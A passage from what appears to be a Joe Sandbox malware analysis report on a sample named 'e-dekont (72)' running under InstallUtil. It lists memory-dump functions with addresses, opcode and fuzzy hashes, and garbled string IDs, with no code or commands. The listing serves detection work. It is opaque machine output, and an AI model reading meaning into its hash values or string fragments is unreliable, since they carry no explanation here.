                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d06e681df08686c265bfbffbbee163bf853d98bb4529a1e64100381614918b3c
                                                                • Instruction ID: 4465a7840690a3905b632f90859106fd41e88af2619a65065b266ba81a8f8178
                                                                • Opcode Fuzzy Hash: d06e681df08686c265bfbffbbee163bf853d98bb4529a1e64100381614918b3c
                                                                • Instruction Fuzzy Hash: 18A107B8E04208CFDB44EFA9D558BADB7F2FB9A300F508129D50AAB394DB349845CF51
                                                                Function 06FAE398 Relevance: .2, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 96c18edb420cdd7d7122e34c54065bacecc6a48bd5738673eb4c9e0a114a8713
                                                                • Instruction ID: 2944029bcfcc50c01eb0d1168a3ff2332b5457b40bd4d2b631749051688c423e
                                                                • Opcode Fuzzy Hash: 96c18edb420cdd7d7122e34c54065bacecc6a48bd5738673eb4c9e0a114a8713
                                                                • Instruction Fuzzy Hash: 417124B4D10318CFEBA4DFA9C884BADBBF6BF49300F1084A9D409A7251DB749985DF50
                                                                Function 06C8304B Relevance: .2, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6433a906df9f7d1bcc6a118caedad18ea9550d045d34580565317dc87bfb2e4a
                                                                • Instruction ID: 0cddaae33d3db922bdcef645915332cd25f5c5d64bd5c5d6001bba26d2c482d0
                                                                • Opcode Fuzzy Hash: 6433a906df9f7d1bcc6a118caedad18ea9550d045d34580565317dc87bfb2e4a
                                                                • Instruction Fuzzy Hash: 0C81E0B4E012198FDB64DF6AC850B9EBBB6BF89300F1081AAD50DA7354DB309E85CF51
                                                                Function 06AD9B18 Relevance: .1, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 501803812c7c291106db80f3a4feaa3463505a6639bd51adddff01f50df8dc29
                                                                • Instruction ID: d5187b69a2cf5b22487da4db63da3cbdc99eed431dfb3afa0dbc48c6f2d394ab
                                                                • Opcode Fuzzy Hash: 501803812c7c291106db80f3a4feaa3463505a6639bd51adddff01f50df8dc29
                                                                • Instruction Fuzzy Hash: 74515874E05218CFEB50EFA9D5447EEBBF6FB4A300F109029D01AAB295D774A885CF80
                                                                Function 06AD9B13 Relevance: .1, Instructions: 143COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53f9184987f92bf189014fb3ad7e9c37b08fc8b70ec48ad8e70e8d30ce259ba4
                                                                • Instruction ID: fc034dd3e0d185f6865149f15ecc38baf75a857768b85ca99a07ee4f28c6f96a
                                                                • Opcode Fuzzy Hash: 53f9184987f92bf189014fb3ad7e9c37b08fc8b70ec48ad8e70e8d30ce259ba4
                                                                • Instruction Fuzzy Hash: 02514874E05208CFEB50EFA9D5447EEBBF6FB4A300F109029D01AAB294D774A885CF40
                                                                Function 06ADE238 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8e97b386c93d04998b293af261ced8e3e898c43f0a0567c4846f24aec1339b6
                                                                • Instruction ID: 8a3aa1924b00ab6a1550b0271c1852afd389057576bb2dcd94e6ffe91bef2eee
                                                                • Opcode Fuzzy Hash: d8e97b386c93d04998b293af261ced8e3e898c43f0a0567c4846f24aec1339b6
                                                                • Instruction Fuzzy Hash: 1851E5B4E05228CFEB54DF9AD8447EDBBF2BB89304F0481AAD50AAB354DB745985CF40
                                                                Function 06AE797B Relevance: .1, Instructions: 128COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 410e5f52430f235a00c78f8205864d386731ced2e4257688c746907817359787
                                                                • Instruction ID: 69c29c67bcfa77a010c0544cd2bb3f9855147f4fb3d9b3f3fe0308a8bd2af183
                                                                • Opcode Fuzzy Hash: 410e5f52430f235a00c78f8205864d386731ced2e4257688c746907817359787
                                                                • Instruction Fuzzy Hash: F84179B1E016199BEB58DFABD94059EFBF3AFC8200F14C06AD908AB225DB305941CF54
                                                                Function 06F90040 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe45b4aa49aaba79a60cf2e538ee27e83a1645e08db7da66605200feaa046078
                                                                • Instruction ID: 3715d7f5a3dbc68dde79d7b2288a26b1f959437f1d13e96ea335bfb56728a181
                                                                • Opcode Fuzzy Hash: fe45b4aa49aaba79a60cf2e538ee27e83a1645e08db7da66605200feaa046078
                                                                • Instruction Fuzzy Hash: 8051C0B4D012298FEB68CF2AC8587DDB6F2AB89304F5080EAD41CA7654DB740AC9CF51
                                                                Function 06AE79B0 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01e6a34485267a1af1c558eb7010b6612e747158b0e0edb87abbb2a16b3f819a
                                                                • Instruction ID: 7b090bdbcefb27afdf1653f91e0eda43410171fae135bf559b8af3d8267e4d5a
                                                                • Opcode Fuzzy Hash: 01e6a34485267a1af1c558eb7010b6612e747158b0e0edb87abbb2a16b3f819a
                                                                • Instruction Fuzzy Hash: 2E4166B5E016598BDB48CFABD94059EFBF3AFC8300F14C07AD958AB264EB305945CB54
                                                                Function 06CF0023 Relevance: .1, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 35bf0a664c3328dcb27b9e841ce508b6e26a423e2acdcf42c6ffc5dfb936236c
                                                                • Instruction ID: 116a516a3b81dfeebbe558d534034c845909ad1fdb3f7b829c06a883e2c94436
                                                                • Opcode Fuzzy Hash: 35bf0a664c3328dcb27b9e841ce508b6e26a423e2acdcf42c6ffc5dfb936236c
                                                                • Instruction Fuzzy Hash: BD515171D056588BEB6DCF2B8C542CAFAF3AFC9300F14C1FA954CA6265DB710A858F41
                                                                Function 06CF0040 Relevance: .1, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052918142.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6cf0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb1b57bd75004c5595fce4ac847d6efcc94b2ab169c0da253fff644898aedfdf
                                                                • Instruction ID: bc48e6cb216c84e8f37656851a65d364463a89d9bc22bc6ca8dbd4126f216fb0
                                                                • Opcode Fuzzy Hash: eb1b57bd75004c5595fce4ac847d6efcc94b2ab169c0da253fff644898aedfdf
                                                                • Instruction Fuzzy Hash: 56510D71D056288BEB6CCF2B8D443CAFAF3AFC9304F54C1FA994CA6255DB714A858E41
                                                                Function 06AE94AF Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b8ea587cd153a8d440b207d903a490201931959680eab6389a8b03ef4e09f7b
                                                                • Instruction ID: a34fe3969baecb44aef908d2e1128fc8773a12fe76b2acaa9a64ab541e94eb4f
                                                                • Opcode Fuzzy Hash: 4b8ea587cd153a8d440b207d903a490201931959680eab6389a8b03ef4e09f7b
                                                                • Instruction Fuzzy Hash: 04417E71D056188FEB5CCF6B8D4079AFAF3AFC9301F14C1BA881CAA215DB3009468F10
                                                                Function 06F90006 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c838c604c3b0593fdc235221bdc4feda8be645f29c8254117e5ecd92f720150
                                                                • Instruction ID: e1ec39404ebfc5616a23d0d1662bbb4257dad57b875a7ee3fa3f60b005e4aad0
                                                                • Opcode Fuzzy Hash: 1c838c604c3b0593fdc235221bdc4feda8be645f29c8254117e5ecd92f720150
                                                                • Instruction Fuzzy Hash: 1D314F71D056548FEB6ACF6A8C542DABFF7AFC9200F04C1EAE44897112DB740A85CF61
                                                                Function 06AE1E87 Relevance: .1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4dad323516a373664092f4492cbc68652d1a8e7b4cf9bec739a25cb3f2bffb32
                                                                • Instruction ID: f3e9ef75ebb00f39b02ad2518a2631c7e45c982f9083674689d66aaf5111a231
                                                                • Opcode Fuzzy Hash: 4dad323516a373664092f4492cbc68652d1a8e7b4cf9bec739a25cb3f2bffb32
                                                                • Instruction Fuzzy Hash: 7D31CA71D056598FEB59CF6B884469AFBF7AFC9300F14C1FA9408AA225DB340A818F51
                                                                Function 06AE0033 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a6f394ec28a481f8ead5959a379b93450b83b31ba11c377f9e817e90ee73b97
                                                                • Instruction ID: 11e516ed66c48f5ebe9e1820d6bfaf95a55ebf4e1da10dd2756e41b63548cb11
                                                                • Opcode Fuzzy Hash: 6a6f394ec28a481f8ead5959a379b93450b83b31ba11c377f9e817e90ee73b97
                                                                • Instruction Fuzzy Hash: 3721C771D056589BEB58DF6BCD002DAFAF7AFC9300F04C0AA9808AA254DB710A46CF40
                                                                Function 06AE0040 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f078bca7ff7df72a0d7cc08121b5bea269344b50d628519ce8426168e29173ea
                                                                • Instruction ID: 5bd8b806b3eee74c438ecf627d812dad525c6ad6f56b76c577910e4d4e662f84
                                                                • Opcode Fuzzy Hash: f078bca7ff7df72a0d7cc08121b5bea269344b50d628519ce8426168e29173ea
                                                                • Instruction Fuzzy Hash: 9621B871E056589BEB58DF6BD9002DEFAF7AFC9310F14C0BA980CAA214DB710A55CF40
                                                                Function 06ADE229 Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a1a02b9bbb5d41d6ee321e5122c0664bfa5a0e8aad027d728b04498dff47302
                                                                • Instruction ID: 2ba1a19ca8b874bcd5122c9afffc160968a44679072ac698891afc8b847eaf86
                                                                • Opcode Fuzzy Hash: 7a1a02b9bbb5d41d6ee321e5122c0664bfa5a0e8aad027d728b04498dff47302
                                                                • Instruction Fuzzy Hash: 5321C8B1D016188BEB18DFABD9447CEFAF3BFC8314F04C1AAD419AA254DB7409868F50
                                                                Function 06C3D2D0 Relevance: 7.7, Strings: 6, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$4'jq$4'jq$4'jq$4'jq$pnq
                                                                • API String ID: 0-2343140522
                                                                • Opcode ID: f19856eb20b8c82b24269b4a4a5a12efb06e5fd1d8d8dfd00a1271b560596d3c
                                                                • Instruction ID: 026906ac23e7116c1f6f2f03da4e7653a0ef2df3146d9c66ebcdb6e65d88e485
                                                                • Opcode Fuzzy Hash: f19856eb20b8c82b24269b4a4a5a12efb06e5fd1d8d8dfd00a1271b560596d3c
                                                                • Instruction Fuzzy Hash: 96519470A402058FC749DF7999506AFBBABBFD8300F14896DC4069B3A9DF78AD05C7A1

                                                                Executed Functions

                                                                Function 00C5B502 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: f2e962c1c8f25ffd9b35ba42ca058024b3475ce4e6a64c475bf2c1fd1f5116fe
                                                                • Instruction ID: 2e2a71331c500eb7d7ded5a9218ae842f4c9ae48a15c7fcdc3f88f8347f64f96
                                                                • Opcode Fuzzy Hash: f2e962c1c8f25ffd9b35ba42ca058024b3475ce4e6a64c475bf2c1fd1f5116fe
                                                                • Instruction Fuzzy Hash: 4181B374E006089FDB14DFAAD944A9DBBF2BF89301F24C069E819AB365DB349D85CF14
                                                                Function 00C5C762 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: e2cd6b4c178232bfd23aafec8f0f088a18aa88d61ba578d014476673b79add50
                                                                • Instruction ID: f4e86652544622243491c41be3727508e47967616989dc694b31f40e8c7c8c14
                                                                • Opcode Fuzzy Hash: e2cd6b4c178232bfd23aafec8f0f088a18aa88d61ba578d014476673b79add50
                                                                • Instruction Fuzzy Hash: A981E774E00218CFDB14DFAAD884A9DBBF2BF89301F14C069E859AB365DB749985CF14
                                                                Function 00C546D9 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: d413cfc0aa7ec469d38e104833b7438fc7c8631f9d890b8cb6c805f631e283f5
                                                                • Instruction ID: 540a3f42c7c4c85f02036c8932436f431935da9e5d5a2de38d8efd559e79c847
                                                                • Opcode Fuzzy Hash: d413cfc0aa7ec469d38e104833b7438fc7c8631f9d890b8cb6c805f631e283f5
                                                                • Instruction Fuzzy Hash: 9281E874E00258DFDB18DFA9D844A9DBBF2BF89305F14C069E818AB365DB345985CF14
                                                                Function 00C5CA42 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: 59bc314cbaae1f2ff2811529d1b40722a6b18c566b016111f0161156d9a29c5d
                                                                • Instruction ID: 0d998322ff20e8143733ac76cafa707878683ac95b57bd077797dc3b2e0a0bf9
                                                                • Opcode Fuzzy Hash: 59bc314cbaae1f2ff2811529d1b40722a6b18c566b016111f0161156d9a29c5d
                                                                • Instruction Fuzzy Hash: 8681D774E00218CFDB14DFA9D984A9DBBF2BF89301F14C069E819AB365DB349985CF14
                                                                Function 00C5B7E6 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: 8dbdeb501b8d24d7745a09f97e45d40a885d07750d31da78f6101200b382e105
                                                                • Instruction ID: f0ae18215b0ce695dfaf97acf340a79f9373cddc7d431d26c0488b439cfd2d8f
                                                                • Opcode Fuzzy Hash: 8dbdeb501b8d24d7745a09f97e45d40a885d07750d31da78f6101200b382e105
                                                                • Instruction Fuzzy Hash: BD81B374E002188FDB14DFAAD944A9DBBF2BF89301F24C069E819AB365DB349D85CF14
                                                                Function 00C5BDA2 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: 3f80423dcfaec6c7e7dc958b5b37fef567f6e17eefda3506995a04853027ab5a
                                                                • Instruction ID: 2d445e7df5d8fc150fb49ce837ebb65fc5312e42a6d1e6ccdf24d13252f09154
                                                                • Opcode Fuzzy Hash: 3f80423dcfaec6c7e7dc958b5b37fef567f6e17eefda3506995a04853027ab5a
                                                                • Instruction Fuzzy Hash: 5181A474E00218DFDB14DFAAD884A9DBBF2BF89301F148069E819AB365DB749D85CF14
                                                                Function 00C5BAC7 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                • API String ID: 0-3395041758
                                                                • Opcode ID: fbe2e2a36de350e84d1f6f5c6a65c3d97e84e7343fdce3a249da1eacb9d717bf
                                                                • Instruction ID: 92e77886c473c67db770f8378b4efae5589b597e9ba45f713b1ccd26ad9823c2
                                                                • Opcode Fuzzy Hash: fbe2e2a36de350e84d1f6f5c6a65c3d97e84e7343fdce3a249da1eacb9d717bf
                                                                • Instruction Fuzzy Hash: E4819374E00218DFDB14DFA9D944A9DBBF2BF88301F148069E819AB365DB749D85CF14
                                                                Function 00C56748 Relevance: 5.5, Strings: 4, Instructions: 452COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ojq$(ojq$,nq$,nq
                                                                • API String ID: 0-2501548412
                                                                • Opcode ID: 056abaeed01f7714262ff2b658604104311ffefcd0dfede4a280628346abd45c
                                                                • Instruction ID: caf5c028e7f1414a63b218c30ea1e0be0ee71cf7e6738d155a6cab750b27fbfa
                                                                • Opcode Fuzzy Hash: 056abaeed01f7714262ff2b658604104311ffefcd0dfede4a280628346abd45c
                                                                • Instruction Fuzzy Hash: 54027234A00209DFCB14CF69C884AAEBBF6FF49301F548169E855EB2A1D731ED89DB54
                                                                Function 00C56120 Relevance: 3.0, Strings: 2, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ojq$Hnq
                                                                • API String ID: 0-4162186043
                                                                • Opcode ID: 09bd4a941c3fb9ca7f9954176201ef137c1f24ec75c2ab169e12f2f09405bbbb
                                                                • Instruction ID: a00b8352dfba9017fa97d961a022f2ab5e6e09822e28ad31d083d715fc60ddd8
                                                                • Opcode Fuzzy Hash: 09bd4a941c3fb9ca7f9954176201ef137c1f24ec75c2ab169e12f2f09405bbbb
                                                                • Instruction Fuzzy Hash: 0302AF74A002198FCB14DF69C954BAEBBF6BF88300F248569E815DB3A5DF349D85CB44
                                                                Function 00C53572 Relevance: 2.8, Strings: 2, Instructions: 269COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xnq$$jq
                                                                • API String ID: 0-65531410
                                                                • Opcode ID: afe4c741add8dd06f471b96169a5b70682bd93f45443dd054755c56955a979bd
                                                                • Instruction ID: 8ba0076c8fd2f02d87674a8aaff6e2e251e39cf60cc01b42b8c9302fe579f3c4
                                                                • Opcode Fuzzy Hash: afe4c741add8dd06f471b96169a5b70682bd93f45443dd054755c56955a979bd
                                                                • Instruction Fuzzy Hash: CF91B634F042989BCB48DB75885437EBBB7BFC5741B24852EE802EB398CE348946DB55
                                                                Function 05558C5F Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PHjq$PHjq
                                                                • API String ID: 0-3092175318
                                                                • Opcode ID: 6144d832c6a78d58dcf15415467365e38fb1ec540f0131e113371e3c00ea74c4
                                                                • Instruction ID: 1c7f37c45ea11f79c706e983fd1263cb147c7a51feef88fe88b6ceb40ccf6953
                                                                • Opcode Fuzzy Hash: 6144d832c6a78d58dcf15415467365e38fb1ec540f0131e113371e3c00ea74c4
                                                                • Instruction Fuzzy Hash: 6A81C074E00218CFDB58DFAAD994BADBBF2BF89310F20816AD819AB354DB745945CF40
                                                                Function 00C5F017 Relevance: .7, Instructions: 716COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a80f5d4ac0327cf1e81b6abc3f7890a7f3673f13572dcfd2c319fd57c6d3d5a3
                                                                • Instruction ID: 83bc9f58fff216b4593460ee8aa2b64c920fca97dcf4fe9a3864b27dd1500833
                                                                • Opcode Fuzzy Hash: a80f5d4ac0327cf1e81b6abc3f7890a7f3673f13572dcfd2c319fd57c6d3d5a3
                                                                • Instruction Fuzzy Hash: C372D178E052288FDB65DF29C984BDEBBB2BB49301F5481E9D808A7255D7309EC6CF44
                                                                Function 05558608 Relevance: .3, Instructions: 296COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09658b620a8e0b70eb41595df92af26bda62fb5b6e23d5ba03aef6894266a7cb
                                                                • Instruction ID: a03dd94abc2fbd3f23edf653f5103fc272ba133db84667fca16e902095f33023
                                                                • Opcode Fuzzy Hash: 09658b620a8e0b70eb41595df92af26bda62fb5b6e23d5ba03aef6894266a7cb
